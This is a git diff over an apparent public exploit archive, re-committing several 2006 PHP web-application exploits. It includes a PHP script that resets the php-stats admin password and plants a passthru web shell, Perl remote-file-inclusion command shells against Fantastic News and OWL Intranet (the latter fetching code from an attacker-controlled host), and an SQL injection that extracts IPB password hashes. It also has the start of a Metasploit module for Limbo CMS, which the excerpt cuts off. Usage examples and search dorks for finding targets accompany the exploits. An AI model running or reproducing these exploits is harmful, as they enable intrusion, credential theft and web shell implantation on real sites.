'; + +function show($headeri) +{ + $ii=0;$ji=0;$ki=0;$ci=0; + echo ''; + while ($ii <= strlen($headeri)-1){ + $datai=dechex(ord($headeri[$ii])); + if ($ji==16) { + $ji=0; + $ci++; + echo ""; + for ($li=0; $li<=15; $li++) { + echo ""; + } + $ki=$ki+16; + echo ""; + } + if (strlen($datai)==1) { + echo ""; + } + else { + echo " "; + } + $ii++;$ji++; + } + for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { + echo ""; + } + for ($li=$ci*16; $li<=strlen($headeri); $li++) { + echo ""; + } + echo "
  ".htmlentities($headeri[$li+$ki])."
0".htmlentities($datai)."".htmlentities($datai)."  ".htmlentities($headeri[$li])."
"; +} + +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; + +function sendpacket() //2x speed +{ + global $proxy, $host, $port, $packet, $html, $proxy_regex; + $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + if ($socket < 0) { + echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) {echo 'Not a valid proxy...'; + die; + } + echo "OK.
"; + echo "Attempting to connect to ".$host." on port ".$port."...
"; + if ($proxy=='') { + $result = socket_connect($socket, $host, $port); + } + else { + $parts =explode(':',$proxy); + echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; + $result = socket_connect($socket, $parts[0],$parts[1]); + } + if ($result < 0) { + echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; + } + else { + echo "OK.

"; + $html= ''; + socket_write($socket, $packet, strlen($packet)); + echo "Reading response:
"; + while ($out= socket_read($socket, 2048)) {$html.=$out;} + echo nl2br(htmlentities($html)); + echo "Closing socket..."; + socket_close($socket); + } + } +} + +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.htmlentities($host); die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid prozy...';die; + } + $parts=explode(':',$proxy); + echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock);echo nl2br(htmlentities($html)); +} + +if ( get_magic_quotes_gpc() ) { + function stripslashes_deep($value) { + $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); + return $value; + } + $_POST = stripslashes_deep($_POST); +} + +$host=$_POST[host];$port=$_POST[port];$path=$_POST[path]; +$cmd=$_POST[cmd];$cmd=urlencode($cmd);$proxy=$_POST[proxy]; +echo ""; + +if (($host<>'') and ($path<>'') and ($cmd<>'')) +{ + $port=intval(trim($port)); + if ($port=='') {$port=80;} + if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} + if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + $host=str_replace("\r","",$host);$host=str_replace("\n","",$host); + $path=str_replace("\r","",$path);$path=str_replace("\n","",$path); + + $SHELL =';if (isset($_GET[cmd])){if (get_magic_quotes_gpc()){'; + $SHELL.='$_GET[cmd] = stripslashes($_GET[cmd]);'; + $SHELL.='}passthru($_GET[cmd]);}//'; + #exploit... 
overwrite option[] array + #set a new admin password at run-time :) + #***************************************** + $data ="option="; + $data.="&option[admin_pass]=suntzu"; + #**************************************** + $data.="&option_new[callviaimg]=1"; + $data.="&option_new[php_stats_safe]=0"; + $data.="&option_new[out_compress]=1"; + $data.="&option_new[persistent_conn]=0"; + $data.="&option_new[autorefresh]=3"; + $data.="&option_new[show_server_details]=1"; + $data.="&option_new[show_average_user]=0"; + $data.="&option_new[short_url]=1"; + $data.="&option_new[lock_not_valid_url]=0"; + $data.="&option_new[ext_whois]="; + $data.="&option_new[online_timeout]=5"; + $data.="&option_new[page_title]="; + $data.="&option_new[online_timeout]=5"; + $data.="&option_new[page_title]=1"; + $data.="&option_new[log_host]=0"; + $data.="&option_new[clear_cache]=0"; + $data.="&option_new[full_recn]=0"; + $data.="&option_new[logerrors]=1"; + $data.="&option_new[check_new_version]=1"; + $data.="&option_new[www_trunc]=0"; + $data.="&option_new[accept_ssi]=1"; + # inject some code in compatibility_mode argument... + # you can use all values, they should be numeric + # but they are not checked + # and not delimited by quotes in config.php + # so it works regardless of magic_quotes_gpc ... 
+ $data.="&option_new[compatibility_mode]=0".$SHELL; + $data.="&option_new[ip-zone]=0"; + $data.="&option_new[down_mode]=0"; + $data.="&option_new[check_links]=1"; + $data.="&mode=modify"; + $packet ="POST ".$p."admin.php?action=modify_config HTTP/1.1\r\n"; + $packet.="User-Agent: John Constantine\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + #******** the magic cookie **************** + $packet.="Cookie: php_stats_cache=1; pass_cookie=".md5("suntzu").";\r\n"; + #****************************************** + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + show($packet); + sendpacketii($packet); + + $packet ="GET ".$p."config.php?cmd=".$cmd." HTTP/1.1\r\n"; + $packet.="User-Agent: URLBlaze\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + show($packet); + sendpacketii($packet); +} +else +{echo "Fill * required fields, optionally specify a proxy...";} +echo ""; +?> + +# milw0rm.com [2006-03-04] diff --git a/platforms/php/webapps/1553.pl b/platforms/php/webapps/1553.pl index 59eff883a..400bea024 100755 --- a/platforms/php/webapps/1553.pl +++ b/platforms/php/webapps/1553.pl 
@@ -1,84 +1,84 @@ -#!/usr/bin/perl -## -# Fantastic News v2.1.2 (and possibly below) Remote Command Execution -# Bug Found By uid0 Exploit Coded by Zod -## -# (c) 2006 -# ExploiterCode.com -## -# usage: -# perl FNews.pl -# -# perl FNews.pl http://site.com/FNews/ http://site.com/cmd.txt cmd -# -# cmd shell example: -# -# cmd shell variable: ($_GET[cmd]); -## -# hai to: zodiac, nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else! -## -# Contact: www.exploitercode.com irc.exploitercode.com -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'archive.php?CONFIG[script_path]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.+).Fatal.error/) -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " * Fantastic News v2.1.2 Remote Command Execution by ExploiterCode.com *\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: FNews.pl \r\n\n"; - print " - Full path to M - Phorum e.g. 
http://www.site.com/FNews/ \r\n"; - print " - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n"; - print " - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " -=Coded by Zod, Bug Found by uid0=-\r\n"; - print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-03-04] +#!/usr/bin/perl +## +# Fantastic News v2.1.2 (and possibly below) Remote Command Execution +# Bug Found By uid0 Exploit Coded by Zod +## +# (c) 2006 +# ExploiterCode.com +## +# usage: +# perl FNews.pl +# +# perl FNews.pl http://site.com/FNews/ http://site.com/cmd.txt cmd +# +# cmd shell example: +# +# cmd shell variable: ($_GET[cmd]); +## +# hai to: zodiac, nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else! +## +# Contact: www.exploitercode.com irc.exploitercode.com +## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'archive.php?CONFIG[script_path]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.+).Fatal.error/) +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print 
"[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " * Fantastic News v2.1.2 Remote Command Execution by ExploiterCode.com *\r\n";
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: FNews.pl \r\n\n";
+ print " - Full path to M - Phorum e.g. http://www.site.com/FNews/ \r\n";
+ print " - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n";
+ print " - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print " -=Coded by Zod, Bug Found by uid0=-\r\n";
+ print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-03-04]
diff --git a/platforms/php/webapps/1556.pl b/platforms/php/webapps/1556.pl
index 2858af2ca..8b172d3a0 100755
--- a/platforms/php/webapps/1556.pl
+++ b/platforms/php/webapps/1556.pl
@@ -1,68 +1,68 @@
-#!/usr/bin/perl
-#########################################################
-# _______ _______ ______ #
-# |______ |______ | \ #
-# ______| |______ |_____/ #
-# #
-#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
-#Created By SkOd #
-#SED security Team #
-#http://www.sed-team.be #
-#skod.uk@gmail.com #
-#ISRAEL #
-#########################################################
-#google:
-#"Powered By D2-Shoutbox 4.2"
-#########################################################
-use IO::Socket;
-$host = $ARGV[0];
-$user = $ARGV[2];
-$uid = $ARGV[3];
-$pid = $ARGV[4];
-$type = $ARGV[5];
-
-sub type()
-{
-if($type==1){$row="password";}
-if($type==2){$row="member_login_key";}
-else{print "Just 1 Or 2\n";exit();}
-$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
-$path = $ARGV[1].$sql;
-}
-
-
-sub header()
-{
-print q{
-#######################################################################
-### D2-Shoutbox 4.2 SQL injection Exploit ###
-### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
-### Created By SkOd, Sed Security Team ###
-#######################################################################
-sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
-sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
-#######################################################################
-}
-}
-
-sub sedsock()
-{
-$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
-print $sedsock "GET $path HTTP/1.1\n";
-print $sedsock "Host: $host\n";
-print $sedsock "Accept: */*\n";
-print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
-print $sedsock "Connection: close\n\n";
-while($res = <$sedsock>){
-$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
-}
-}
-
-if(@ARGV < 6){
-header();
-}else{
-type();
-sedsock();
-}
-
-# milw0rm.com [2006-03-06]
+#!/usr/bin/perl
+#########################################################
+# _______ _______ ______ #
+# |______ |______ | \ #
+# ______| |______ |_____/ #
+# #
+#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
+#Created By SkOd #
+#SED security Team #
+#http://www.sed-team.be #
+#skod.uk@gmail.com #
+#ISRAEL #
+#########################################################
+#google:
+#"Powered By D2-Shoutbox 4.2"
+#########################################################
+use IO::Socket;
+$host = $ARGV[0];
+$user = $ARGV[2];
+$uid = $ARGV[3];
+$pid = $ARGV[4];
+$type = $ARGV[5];
+
+sub type()
+{
+if($type==1){$row="password";}
+if($type==2){$row="member_login_key";}
+else{print "Just 1 Or 2\n";exit();}
+$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
+$path = $ARGV[1].$sql;
+}
+
+
+sub header()
+{
+print q{
+#######################################################################
+### D2-Shoutbox 4.2 SQL injection Exploit ###
+### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
+### Created By SkOd, Sed Security Team ###
+#######################################################################
+sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
+sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
+#######################################################################
+}
+}
+
+sub sedsock()
+{
+$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
+print $sedsock "GET $path HTTP/1.1\n";
+print $sedsock "Host: $host\n";
+print $sedsock "Accept: */*\n";
+print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
+print $sedsock "Connection: close\n\n";
+while($res = <$sedsock>){
+$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
+}
+}
+
+if(@ARGV < 6){
+header();
+}else{
+type();
+sedsock();
+}
+
+# milw0rm.com [2006-03-06]
diff --git a/platforms/php/webapps/1561.pl b/platforms/php/webapps/1561.pl index 6e36ccb5d..fb1f6471d 100755 --- a/platforms/php/webapps/1561.pl +++ b/platforms/php/webapps/1561.pl 
@@ -1,83 +1,83 @@ -#!/usr/bin/perl -use IO::Socket; -print "WwwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWwoLWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWw**wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWo°*òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWwo° *òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWò° °°*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWwo° °°*oòwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWwò*° °*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWWWWWWwò*° °òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWwwwLLwwwWWwo° oWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWL*° °*o° °wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWW* °*òwwwwwwò* WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWo °Lwwwwwwwwwwwwò °WWWWWWwwwwwWWWWWWwwwwwwwwwwwwwWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWò *wwwwwwwwwwwwwwww° wWWWW* *WWWWw oWWWWWWWWW\r\n"; -print "WWWWWWWWWWW° °wwwwwò° °*wwwwww °WWWw wWWW° w oWWWWWWWWW\r\n"; -print "WWWWWWWWWWW owwww* °* owwww° wWW* °WWw oW oWWWWWWWWW\r\n"; -print "WWWWWWWWWWW °wwww * °wwww *Ww o wW* *WW oWWWWWWWWW\r\n"; -print "WWWWWWWWWWWo owww° owww° o w* °W° °w wWW oWWWWWWWWW\r\n"; -print "WWWWWWWWWWWW* *wwwo° °òwww° oWo ° wWL ° òWWW *wwwwwwwww\r\n"; -print "WWWWWWWWWWWWWL° °òwwwwwwwwo° *wWWW° *WWW° °WWWW\r\n"; -print "WWWWWWWWWWWWWWWwo° °°° °*LWWWWWWW wWWWL °WWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWwwwwLLLwwwwWWWWWWWWWWWWo *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW° 
wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWo wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW° *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; -print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw°WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n\r\n"; -print " OWL Intranet Engine 0.82 \"xrms_file_root\" cmmnds xctn xploit\r\n"; -print " -> works with register_globals = On & allow_url_fopen = On \r\n"; -print " by rgod rgodautisticiorg \r\n"; -print " site: http://retrogod.altervista.org \r\n\r\n"; -print "Sun-Tzu: \"But a kingdom that has once been destroyed can never come\r\n"; -print "again into being; nor can the dead ever be brought back to life\"\r\n\r\n"; -print "\r\n dork: intitle:\"owl intranet * owl\" 0.82\r\n"; -sub main::urlEncode { - my ($string) = @_; - $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; - #$string# =~ tr/.//; - return $string; - } - -$serv=$ARGV[0]; -$path=$ARGV[1]; -$loc=urlEncode($ARGV[2]); -$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; - -if (@ARGV < 4) -{ -print "\r\nUsage:\r\n"; -print "perl owl_082_xpl.pl SERVER PATH LOCATION COMMAND\r\n\r\n"; -print "SERVER - Server where OWL is installed.\r\n"; -print "PATH - Path to OWL (ex: /owl/ or just /) \r\n"; -print "LOCATION - a site with the code to include (without ending slash)\r\n"; -print "COMMAND - a Unix command\r\n\r\n"; -print "Example:\r\n"; -print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 ls -la\r\n"; -print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 cat ./../config/owl.php\r\n\r\n"; -print "note: on http location you need this code in /include-locations.inc/index.html :\r\n\r\n"; - -print "\r\n"; -exit(); -} - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)") - or die "[+] Connecting ... 
Could not connect to host.\n\n"; - print $sock "GET ".$path."lib/OWL_API.php?cmd=".$cmd."&xrms_file_root=".$loc." HTTP/1.1\r\n"; - print $sock "User-Agent: Y!TunnelPro\r\n"; - print $sock "Host: ".$serv."\r\n"; - print $sock "Connection: close\r\n\r\n"; - - while ($answer = <$sock>) { - print $answer; - } - close($sock); - -# milw0rm.com [2006-03-07] +#!/usr/bin/perl +use IO::Socket; +print "WwwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWwoLWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWw**wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWo°*òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWwo° *òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWò° °°*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWwo° °°*oòwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWwò*° °*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWWWWWWwò*° °òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWwwwLLwwwWWwo° oWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWL*° °*o° °wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWW* °*òwwwwwwò* WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWo °Lwwwwwwwwwwwwò °WWWWWWwwwwwWWWWWWwwwwwwwwwwwwwWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWò *wwwwwwwwwwwwwwww° wWWWW* *WWWWw oWWWWWWWWW\r\n"; +print "WWWWWWWWWWW° °wwwwwò° °*wwwwww °WWWw wWWW° w oWWWWWWWWW\r\n"; +print "WWWWWWWWWWW owwww* °* owwww° wWW* °WWw oW oWWWWWWWWW\r\n"; +print "WWWWWWWWWWW °wwww * °wwww *Ww o wW* *WW oWWWWWWWWW\r\n"; +print "WWWWWWWWWWWo owww° owww° o w* °W° °w wWW oWWWWWWWWW\r\n"; +print "WWWWWWWWWWWW* *wwwo° °òwww° oWo ° 
wWL ° òWWW *wwwwwwwww\r\n"; +print "WWWWWWWWWWWWWL° °òwwwwwwwwo° *wWWW° *WWW° °WWWW\r\n"; +print "WWWWWWWWWWWWWWWwo° °°° °*LWWWWWWW wWWWL °WWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWwwwwLLLwwwwWWWWWWWWWWWWo *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW° wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWo wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW° *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; +print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw°WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n\r\n"; +print " OWL Intranet Engine 0.82 \"xrms_file_root\" cmmnds xctn xploit\r\n"; +print " -> works with register_globals = On & allow_url_fopen = On \r\n"; +print " by rgod rgodautisticiorg \r\n"; +print " site: http://retrogod.altervista.org \r\n\r\n"; +print "Sun-Tzu: \"But a kingdom that has once been destroyed can never come\r\n"; +print "again into being; nor can the dead ever be brought back to life\"\r\n\r\n"; +print "\r\n dork: intitle:\"owl intranet * owl\" 0.82\r\n"; +sub main::urlEncode { + my ($string) = @_; + $string =~ s/(\W)/"%" . 
unpack("H2", $1)/ge; + #$string# =~ tr/.//; + return $string; + } + +$serv=$ARGV[0]; +$path=$ARGV[1]; +$loc=urlEncode($ARGV[2]); +$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; + +if (@ARGV < 4) +{ +print "\r\nUsage:\r\n"; +print "perl owl_082_xpl.pl SERVER PATH LOCATION COMMAND\r\n\r\n"; +print "SERVER - Server where OWL is installed.\r\n"; +print "PATH - Path to OWL (ex: /owl/ or just /) \r\n"; +print "LOCATION - a site with the code to include (without ending slash)\r\n"; +print "COMMAND - a Unix command\r\n\r\n"; +print "Example:\r\n"; +print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 ls -la\r\n"; +print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 cat ./../config/owl.php\r\n\r\n"; +print "note: on http location you need this code in /include-locations.inc/index.html :\r\n\r\n"; + +print "\r\n"; +exit(); +} + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)") + or die "[+] Connecting ... Could not connect to host.\n\n"; + print $sock "GET ".$path."lib/OWL_API.php?cmd=".$cmd."&xrms_file_root=".$loc." HTTP/1.1\r\n"; + print $sock "User-Agent: Y!TunnelPro\r\n"; + print $sock "Host: ".$serv."\r\n"; + print $sock "Connection: close\r\n\r\n"; + + while ($answer = <$sock>) { + print $answer; + } + close($sock); + +# milw0rm.com [2006-03-07] diff --git a/platforms/php/webapps/1563.pm b/platforms/php/webapps/1563.pm index 64c8ca70c..2df9166aa 100755 --- a/platforms/php/webapps/1563.pm +++ b/platforms/php/webapps/1563.pm 
@@ -1,169 +1,169 @@
-##
-# Title: Limbo CMS version 1.x suffers from a remote code execution vulnerability.
-# Name: limbo_cms_1_x.pm
-# License: Artistic/BSD/GPL
-# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
-#
-#
-# - This is an exploit module for the Metasploit Framework, please see
-# http://metasploit.com/projects/Framework for more information.
-##
-
-package Msf::Exploit::limbo_cms_1_x;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-use bytes;
-
-my $advanced = { };
-
-my $info = {
- 'Name' => 'Limbo CMS version 1.x Code Execution',
- 'Version' => '$Revision: 1.1 $',
- 'Authors' => [ 'sirh0t < sirh0t [at] hotmail.com >' ],
- 'Arch' => [ ],
- 'OS' => [ ],
- 'Priv' => 0,
- 'UserOpts' =>
- {
- 'RHOST' => [1, 'ADDR', 'The target address'],
- 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
- 'RPORT' => [1, 'PORT', 'The target port', 80],
- 'RPATH' => [1, 'DATA', 'Path to the index.php script', ' /limbo/index.php'],
- 'SSL' => [0, 'BOOL', 'Use SSL'],
- },
-
- 'Description' => Pex::Text::Freeform(qq{
- This module exploits an arbitrary PHP code execution flaw in the Limbo version 1.*. All versions UNPATCHED Limbo 1.x are affected. Bug found by Aleksander Hristov
-}),
-#milw0rm this is your part ;p
- 'Refs' =>
- [
- ['OSVDB', '-----'],
- ['CVE', '---------'],
- ['MIL', '125'],
- ],
-
- 'Payload' =>
- {
- 'Space' => 512,
- 'Keys' => ['cmd', 'cmd_bash'],
- },
-
- 'DefaultTarget' => 1,
- 'Targets' =>
- [
- ['Vulnerably test',0],
- ['use system()', 1],
- ['use exec()', 2],
- ['use shell_exec()',3],
- ['use passthru()',4],
- ],
-
-
- 'Keys' => ['limbo'],
-
- 'DisclosureDate' => 'Mar 03 2006',
- };
-
-sub new {
- my $class = shift;
